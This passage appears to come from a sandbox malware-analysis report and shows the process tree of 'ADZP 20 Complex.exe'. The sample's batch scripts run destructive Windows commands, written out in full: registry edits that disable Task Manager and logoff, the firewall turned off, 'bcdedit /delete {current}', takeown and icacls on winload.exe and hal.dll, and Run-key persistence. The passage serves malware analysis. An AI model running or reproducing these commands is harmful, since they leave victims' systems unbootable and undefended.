        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:408
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:6824
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:4268
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        7⤵
        Modifies Windows Firewall
        
        PID:4992
        
        C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        7⤵
        Modifies boot configuration data using bcdedit
        
        PID:8888
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:5572
        
        C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        7⤵
        
        PID:9612
        
        C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        7⤵
        
        PID:7424
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3848
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:400
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5040
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:2656
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:1816
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4BC9.tmp\4BCA.tmp\4BCB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:5668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7316
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:6232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2156
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:6920
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:1212
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8120
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8016
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:2024
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:444
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7332
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5552
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4128
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5200
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7204
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8204
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:4484
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8668
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5216
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7560
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8740
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7236
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9276
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9472
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9584
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9740
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9956
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:7948
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCE9.tmp\DCEA.tmp\DCEB.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:10396
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10416
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10652
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10836
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11124
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11552
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11852
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5084
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:488
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1212
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:4728
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5128
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4CD4.tmp\4CE4.tmp\4CE5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:496
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6928
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:2320
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:2024
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7136
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:8168
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7136
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7764
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8080
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7488
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:6300
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:4744
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4700
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:8052
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:8052
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8296
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7360
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9724
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9924
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10172
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9336
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10324
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10588
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10744
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10956
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9792
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11468
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11768
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5612
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5764
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5780
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5788
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:5796
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6476
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6860
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7072
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:452
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:5904
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7212
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:7888
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8152
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:6744
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        
        PID:7600
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4036
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:3856
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:3616
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:1844
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    PID:4264
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EC15.tmp\EC16.tmp\EC17.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      PID:756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:4772
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3616
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        
        PID:1688
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3844
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1452
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2876
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:956
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4728
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1816
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3132
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:4780
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:3708
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:3068
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:32
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2656
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:100
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:400
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6036
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6044
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6052
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6064
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6072
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6080
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6088
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6096
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:6104
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:6112
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6120
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5ABD.tmp\5ABE.tmp\5ABF.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:6268
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:4272
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:1616
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1212
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2928
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:7224
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:2748
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8148
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2928
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4072
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2820
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:6308
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5852
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:5316
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5148
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8288
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8884
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9284
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9480
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9592
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9748
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9964
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10204
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9704
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10368
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10644
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10808
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:10096
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C75.tmp\C76.tmp\C77.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        8⤵
        
        PID:11280
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9028
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:11372
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11636
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6128
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6136
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5156
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5240
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5580
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5C73.tmp\5C74.tmp\5C75.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:6640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:1276
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7348
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:8060
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7224
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7664
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:7804
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7332
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4852
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:3524
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7980
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:6176
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6300
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:7732
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5804
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:3464
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8440
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9868
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10132
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9456
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10280
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10552
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10712
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10900
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11220
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7880
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        7⤵
        
        PID:11720
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6428
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6700
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6760
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6848
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:7116
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\86FE.tmp\86FF.tmp\871F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:1472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4848
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:8060
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:7072
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3396
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7944
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:6232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7804
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4636
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:7704
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:7484
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7732
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:444
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:4044
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:7836
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5200
        
        C:\Windows\system32\reg.exe
        
